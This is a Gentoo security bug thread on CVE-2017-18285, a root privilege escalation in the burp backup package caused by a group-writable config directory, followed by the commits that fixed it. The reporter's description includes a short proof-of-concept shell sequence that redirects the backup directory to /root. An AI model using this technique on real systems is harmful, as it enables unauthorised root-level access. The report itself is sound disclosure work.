Bug 641842 (CVE-2017-18285)

Summary:	<app-backup/burp-2.1.32-r1: root privilege escalation via writable config directory
Product:	Gentoo Security	Reporter:	Michael Orlitzky <mjo>
Component:	Vulnerabilities	Assignee:	Gentoo Security <security>
Status:	RESOLVED FIXED
Severity:	major	CC:	marecki
Priority:	High	Flags:	stable-bot: sanity-check+
Version:	unspecified
Hardware:	All
OS:	Linux
Whiteboard:	B1 [glsa+ cve]
Package list:	=app-backup/burp-2.1.32-r1	Runtime testing required:	No
Bug Depends on:	655950, 681738
Bug Blocks:

Description Michael Orlitzky gentoo-dev

2017-12-20 20:10:53 UTC

The configuration directory for burp gets installed writable by the "burp" group :

  $ ls -l /etc | grep burp
  drwxrwxr-x  6 root burp    4.0K 2017-12-20 14:52 burp

The server configuration file is supposed to be writable only by root, but since /etc/burp is writable by the "burp" group, the server configuration file essentially is too. That can be exploited by the "burp" user to edit the server configuration file, and trick the init script into giving him any file on the machine.

The init script does,

  get_backup_dir() {
    grep '^directory = ' /etc/burp/burp-server.conf | sed -e 's/^directory = //'
  }

  start_pre() {
    ...
    checkpath -o root:burp -m 0770 -d "$(get_backup_dir)"
  }

So if the "burp" user makes a clever edit to burp-server.conf, the call to checkpath will give him read/write access to whatever he wants.

Proof of concept:

  # Pretend we're the burp user...
  $ sudo su burp -s /bin/sh
  $ cd /etc/burp

  # Set the backup directory to /root
  $ sed 's:/var/spool/burp:/root:' burp-server.conf > burp-server.mine
  $ rm -f burp-server.conf
  $ mv burp-server.mine burp-server.conf
  $ exit

Now as root, start the service...

  $ sudo /etc/init.d/burp start
   * /etc/burp/burp-server.conf: correcting mode
   * /etc/burp/burp-server.conf: correcting owner
   * /root: correcting mode
   * /root: correcting owner
   * Starting burp ...

and /root is writable by "burp".

Comment 1 Marek Szuba (RETIRED) archtester

2017-12-21 14:40:05 UTC

And once again, I received no e-mail notification. Strange. Anyway, looks like this one has been inherited from the previous maintainer... I have just tightened down permissions on /etc/burp for both the 2.0 (2.0.54-r4) and the 2.1 (2.1.24-r1) branch.

Comment 2 Thomas Deutschmann (RETIRED) gentoo-dev

2018-02-21 23:22:36 UTC

@ Maintainer(s): Can we please get an status update?

Comment 3 Larry the Git Cow gentoo-dev

2018-05-29 09:26:35 UTC

The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=5cd39164b55ee94a0754a89c0069f228e58183ee

commit 5cd39164b55ee94a0754a89c0069f228e58183ee
Author:     Marek Szuba <marecki@gentoo.org>
AuthorDate: 2018-05-29 09:25:37 +0000
Commit:     Marek Szuba <marecki@gentoo.org>
CommitDate: 2018-05-29 09:26:30 +0000

    app-backup/burp: remove old following full stabilisation of 2.1.32
    
    There are now no versions left in the tree that are vulnerable to
    either #628770 or #641842
    
    Bug: https://bugs.gentoo.org/show_bug.cgi?id=628770
    Bug: https://bugs.gentoo.org/show_bug.cgi?id=641842
    Package-Manager: Portage-2.3.40, Repoman-2.3.9

 app-backup/burp/Manifest                           |   1 -
 app-backup/burp/burp-2.0.54-r4.ebuild              | 111 ---------------------
 app-backup/burp/burp-2.0.54.ebuild                 | 110 --------------------
 .../burp-2.0.54-chuser_after_getting_lock.patch    |  38 -------
 .../files/burp-2.0.54-ncurses_pkg-config.patch     |  37 -------
 .../burp/files/burp-2.0.54-no_mkdir_run.patch      |  10 --
 .../files/burp-2.0.54-protocol1_by_default.patch   |  24 -----
 app-backup/burp/files/burp.tmpfiles                |   1 -
 app-backup/burp/files/burp2.initd                  |  45 ---------
 9 files changed, 377 deletions(-)

Comment 4 Christopher Díaz Riveros (RETIRED) gentoo-dev

2018-06-04 03:12:57 UTC

CVE-2017-18285 assigned to this issue.

Comment 5 GLSAMaker/CVETool Bot gentoo-dev

2018-06-13 20:56:42 UTC

This issue was resolved and addressed in
 GLSA 201806-03 at https://security.gentoo.org/glsa/201806-03
by GLSA coordinator Aaron Bauman (b-man).

Comment 6 Michael Orlitzky gentoo-dev

2018-06-24 02:01:32 UTC

This isn't quite fixed =(

Marek fixed the initial permissions on /etc/burp in the ebuild:

  fowners -R root:${PN} /etc/burp
  fperms 0750 /etc/burp
  fperms 0640 /etc/burp/burp-server.conf
  fperms 0750 /etc/burp/clientconfdir

Those look OK to me, but the init script messes them up the first time that the daemon is started:

  start_pre() {
    checkpath -o root:burp -m 0775 -d /etc/burp
    checkpath -o root:burp -m 0640 -f /etc/burp/burp-server.conf
    checkpath -o root:burp -m 0750 -d /etc/burp/clientconfdir
    checkpath -o root:burp -m 0770 -d "$(get_backup_dir)"
  }

So after you start the daemon once, the same proof-of-concept in comment #1 works again.

Comment 7 Thomas Deutschmann (RETIRED) gentoo-dev

2018-07-10 22:40:47 UTC

See comment #6, this is not fixed. Re-opening...

@ Maintainer(s): Please have a look again, thanks!

Comment 8 Yury German Gentoo Infrastructure

2019-03-12 06:10:13 UTC

Please see comments. This needs to be addressed.

Comment 9 Larry the Git Cow gentoo-dev

2019-03-25 14:16:40 UTC

The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=2faf0fcb38eaf787d0f9d18217274e16bce120b5

commit 2faf0fcb38eaf787d0f9d18217274e16bce120b5
Author:     Marek Szuba <marecki@gentoo.org>
AuthorDate: 2019-03-25 14:16:10 +0000
Commit:     Marek Szuba <marecki@gentoo.org>
CommitDate: 2019-03-25 14:16:10 +0000

    app-backup/burp: add version 2.1.32-r1
    
    Identical to 2.1.32 apart from the copyright note, to be fast-stabilised
    on amd64 and x86 to propagate init-script change addressing Bug #641842.
    
    Bug: https://bugs.gentoo.org/641842
    Signed-off-by: Marek Szuba <marecki@gentoo.org>
    Package-Manager: Portage-2.3.62, Repoman-2.3.11

 app-backup/burp/burp-2.1.32-r1.ebuild | 109 ++++++++++++++++++++++++++++++++++
 1 file changed, 109 insertions(+)

Comment 10 Marek Szuba (RETIRED) archtester

2019-03-25 14:24:58 UTC

Wouldn't it be great if I actually started getting e-mail notifications about this, at last... Hopefully fixed for good this time.

Comment 11 Aaron Bauman (RETIRED) gentoo-dev

2019-03-25 14:58:29 UTC

@arches, please stable.

Comment 12 Agostino Sarubbo gentoo-dev

2019-03-27 20:04:51 UTC

amd64 stable

Comment 13 Thomas Deutschmann (RETIRED) gentoo-dev

2019-03-27 23:20:49 UTC

x86 stable

Comment 14 Aaron Bauman (RETIRED) gentoo-dev

2019-03-27 23:33:50 UTC

@maintainer, please drop the vulnerable.

Comment 15 Thomas Deutschmann (RETIRED) gentoo-dev

2019-03-27 23:45:44 UTC

x86 stable

Comment 16 Larry the Git Cow gentoo-dev

2019-03-28 09:40:12 UTC

The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=85c9437e4cb6c6c711bdb502379611adb2e162f8

commit 85c9437e4cb6c6c711bdb502379611adb2e162f8
Author:     Marek Szuba <marecki@gentoo.org>
AuthorDate: 2019-03-28 09:39:39 +0000
Commit:     Marek Szuba <marecki@gentoo.org>
CommitDate: 2019-03-28 09:39:39 +0000

    app-backup/burp: drop vulnerable
    
    Bug: https://bugs.gentoo.org/641842
    Signed-off-by: Marek Szuba <marecki@gentoo.org>
    Package-Manager: Portage-2.3.62, Repoman-2.3.11

 app-backup/burp/burp-2.1.32.ebuild | 109 -------------------------------------
 1 file changed, 109 deletions(-)

Comment 17 GLSAMaker/CVETool Bot gentoo-dev

2019-04-02 04:24:28 UTC

This issue was resolved and addressed in
 GLSA 201904-05 at https://security.gentoo.org/glsa/201904-05
by GLSA coordinator Aaron Bauman (b-man).